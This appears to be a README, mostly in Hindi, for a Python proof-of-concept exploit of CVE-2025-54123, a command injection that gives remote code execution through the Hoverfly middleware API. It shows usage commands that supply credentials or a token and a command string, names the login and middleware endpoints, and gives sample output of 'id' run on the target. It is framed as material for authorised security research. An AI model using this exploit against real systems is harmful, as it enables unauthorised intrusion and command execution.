
Python proof-of-concept CVE-2025-54123 के लिए, जो Hoverfly middleware API में credential या token-based authentication के साथ command injection से RCE तक का प्रदर्शन करता है।
इस रिपॉजिटरी में CVE-2025-54123 से प्रभावित Hoverfly इंस्टेंस के साथ इंटरैक्ट करने के लिए एक Python प्रूफ-ऑफ-कॉन्सेप्ट (PoC) स्क्रिप्ट शामिल है।
स्क्रिप्ट निम्नलिखित का समर्थन करती है:
चेतावनी
यह प्रोजेक्ट केवल अधिकृत सुरक्षा अनुसंधान, परीक्षण और शैक्षिक उद्देश्यों के लिए है। इसे स्पष्ट अनुमति के बिना सिस्टम के खिलाफ उपयोग न करें।
निर्भरताएँ स्थापित करें:
pip install requests
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
-u admin \
-p password \
--cmd "id"
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
--token <ACCESS_TOKEN> \
--cmd "id"
| Argument | Description |
|---|---|
--target | लक्ष्य डोमेन या IP पता |
--port | लक्ष्य सेवा पोर्ट |
-u | Hoverfly उपयोगकर्ता नाम |
-p | Hoverfly पासवर्ड |
--token | मौजूदा बियरर टोकन |
--cmd | मिडलवेयर एंडपॉइंट को आपूर्ति की गई कमांड स्ट्रिंग |
जब क्रेडेंशियल्स प्रदान किए जाते हैं:
/api/token-auth
स्क्रिप्ट इसके साथ संवाद करती है:
/api/v2/hoverfly/middleware
एक प्रमाणित PUT अनुरोध का उपयोग करके।
Approaching target : example.com
Attempting login to http://example.com:8888/api/token-auth
Checking Credentials....
Login Successful!
Injected : id
uid=1000(user) gid=1000(user)
.
├── CVE-2025-54123.py
└── README.md
यह रिपॉजिटरी केवल शैक्षिक, रक्षात्मक सुरक्षा और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान की गई है। लेखक इस सॉफ्टवेयर के उपयोग से उत्पन्न दुरुपयोग, क्षति या कानूनी परिणामों के लिए कोई जिम्मेदारी नहीं लेता है।